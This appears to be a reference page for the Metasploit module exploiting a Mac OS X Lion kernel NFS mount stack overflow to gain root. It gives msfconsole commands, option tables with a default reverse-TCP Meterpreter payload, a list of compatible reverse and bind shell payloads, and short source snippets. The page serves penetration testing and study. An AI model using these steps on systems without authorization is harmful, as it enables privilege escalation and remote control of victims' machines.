Mac OS X NFS Mount Privilege Escalation Exploit - Metasploit


This page contains detailed information about how to use the exploit/osx/local/nfs_mount_root metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Mac OS X NFS Mount Privilege Escalation Exploit
Module: exploit/osx/local/nfs_mount_root
Source code: modules/exploits/osx/local/nfs_mount_root.rb
Disclosure date: 2014-04-11
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x64
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This exploit leverages a stack buffer overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result, by passing a large size as an argument, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/osx/local/nfs_mount_root
msf exploit(nfs_mount_root) > show targets
    ... a list of targets ...
msf exploit(nfs_mount_root) > set TARGET target-id
msf exploit(nfs_mount_root) > show options
    ... show and set options ...
msf exploit(nfs_mount_root) > set SESSION session-id
msf exploit(nfs_mount_root) > exploit

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the osx/local/nfs_mount_root exploit module looks in the msfconsole:

msf6 > use exploit/osx/local/nfs_mount_root

[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/nfs_mount_root) > show info

       Name: Mac OS X NFS Mount Privilege Escalation Exploit
     Module: exploit/osx/local/nfs_mount_root
   Platform: OSX
       Arch: x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-04-11

Provided by:
  Kenzley Alphonse
  joev <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Mac OS X 10.7 Lion x64 (Native Payload)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This exploit leverages a stack buffer overflow vulnerability to 
  escalate privileges. The vulnerable function 
  nfs_convert_old_nfs_args does not verify the size of a user-provided 
  argument before copying it to the stack. As a result, by passing a 
  large size as an argument, a local user can overwrite the stack with 
  arbitrary content. Mac OS X Lion Kernel <= xnu-1699.32.7 except 
  xnu-1699.24.8 are affected.

References:
  https://www.exploit-db.com/exploits/32813

Module Options


This is a complete list of options available in the osx/local/nfs_mount_root exploit:

msf6 exploit(osx/local/nfs_mount_root) > show options

Module options (exploit/osx/local/nfs_mount_root):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (osx/x64/meterpreter/reverse_tcp):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   LHOST                  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT                  4444             yes       The listen port
   MeterpreterDebugLevel  0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)

Exploit target:

   Id  Name
   --  ----
   0   Mac OS X 10.7 Lion x64 (Native Payload)

Advanced Options


Here is a complete list of advanced options supported by the osx/local/nfs_mount_root exploit:

msf6 exploit(osx/local/nfs_mount_root) > show advanced

Module advanced options (exploit/osx/local/nfs_mount_root):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (osx/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the osx/local/nfs_mount_root module can exploit:

msf6 exploit(osx/local/nfs_mount_root) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Mac OS X 10.7 Lion x64 (Native Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the osx/local/nfs_mount_root exploit:

msf6 exploit(osx/local/nfs_mount_root) > show payloads

Compatible Payloads
===================

   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/osx/x64/dupandexecve/bind_tcp                           normal  No     OS X dup2 Command Shell, Bind TCP Stager
   4   payload/osx/x64/dupandexecve/reverse_tcp                        normal  No     OS X dup2 Command Shell, Reverse TCP Stager
   5   payload/osx/x64/dupandexecve/reverse_tcp_uuid                   normal  No     OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
   6   payload/osx/x64/exec                                            normal  No     OS X x64 Execute Command
   7   payload/osx/x64/meterpreter/bind_tcp                            normal  No     OSX Meterpreter, Bind TCP Stager
   8   payload/osx/x64/meterpreter/reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Stager
   9   payload/osx/x64/meterpreter/reverse_tcp_uuid                    normal  No     OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
   10  payload/osx/x64/meterpreter_reverse_http                        normal  No     OSX Meterpreter, Reverse HTTP Inline
   11  payload/osx/x64/meterpreter_reverse_https                       normal  No     OSX Meterpreter, Reverse HTTPS Inline
   12  payload/osx/x64/meterpreter_reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Inline
   13  payload/osx/x64/say                                             normal  No     OS X x64 say Shellcode
   14  payload/osx/x64/shell_bind_tcp                                  normal  No     OS X x64 Shell Bind TCP
   15  payload/osx/x64/shell_reverse_tcp                               normal  No     OS X x64 Shell Reverse TCP

Evasion Options


Here is the full list of possible evasion options supported by the osx/local/nfs_mount_root exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(osx/local/nfs_mount_root) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Session already has root privileges


Here is a relevant code snippet related to the "Session already has root privileges" error message:

57:	    end
58:	  end
59:	
60:	  def exploit
61:	    if is_root?
62:	      fail_with Failure::BadConfig, 'Session already has root privileges'
63:	    end
64:	
65:	    if check != CheckCode::Appears
66:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
67:	    end

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

61:	    if is_root?
62:	      fail_with Failure::BadConfig, 'Session already has root privileges'
63:	    end
64:	
65:	    if check != CheckCode::Appears
66:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
67:	    end
68:	
69:	    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
70:	    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
71:	    exploit = File.read(file)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Kenzley Alphonse
  • joev

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.